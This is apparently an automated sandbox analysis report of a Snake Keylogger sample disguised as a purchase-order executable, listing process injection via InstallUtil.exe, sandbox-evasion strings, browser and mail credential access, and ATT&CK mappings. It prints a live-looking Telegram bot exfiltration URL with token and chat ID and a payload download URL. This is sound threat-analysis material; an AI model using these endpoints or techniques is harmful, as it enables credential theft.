Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: InstallUtil.exe, 00000007.00000002.3705718621.0000000001217000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW\
Source: InstallUtil.exe, 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfe6ad1716199<
Source: InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfe16f480c19b<
Source: InstallUtil.exe, 0000000C.00000002.3706390487.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: Keywords.exe, 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Keywords.exe, 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: wscript.exe, 0000000A.00000002.1425579440.0000024335D95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1295829976.000000000119A000.00000004.00000020.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1493177688.00000000014D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 12_2_06217D90 LdrInitializeThunk,

12_2_06217D90

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Keywords.exe "C:\Users\user\AppData\Roaming\Keywords.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Queries volume information: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Queries volume information: C:\Users\user\AppData\Roaming\Keywords.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3709580619.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3709580619.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	2 Command and Scripting Interpreter	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO_63738373663838____________________________________________________________________________.exe	39%	ReversingLabs	ByteCode-MSIL.Downloader.Jalapeno
PO_63738373663838____________________________________________________________________________.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Keywords.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Keywords.exe	39%	ReversingLabs	ByteCode-MSIL.Downloader.Jalapeno

Source	Detection	Scanner	Label
https://erkasera.com/ruurew/Gksrgyexmxn.pdfYj	0%	Avira URL Cloud	safe
https://erkasera.com/ruurew/Gksrgyexmxn.pdf	0%	Avira URL Cloud	safe
https://erkasera.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
erkasera.com	188.132.193.46	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://erkasera.com/ruurew/Gksrgyexmxn.pdf	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high
https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false		high
https://reallyfreegeoip.org/xml/173.254.250.76	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/173.254.250.76$	InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302	InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://erkasera.com	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003331000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://erkasera.com/ruurew/Gksrgyexmxn.pdfYj	PO_63738373663838____________________________________________________________________________.exe, Keywords.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	InstallUtil.exe, 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.telegram.org/bot	InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	false		high
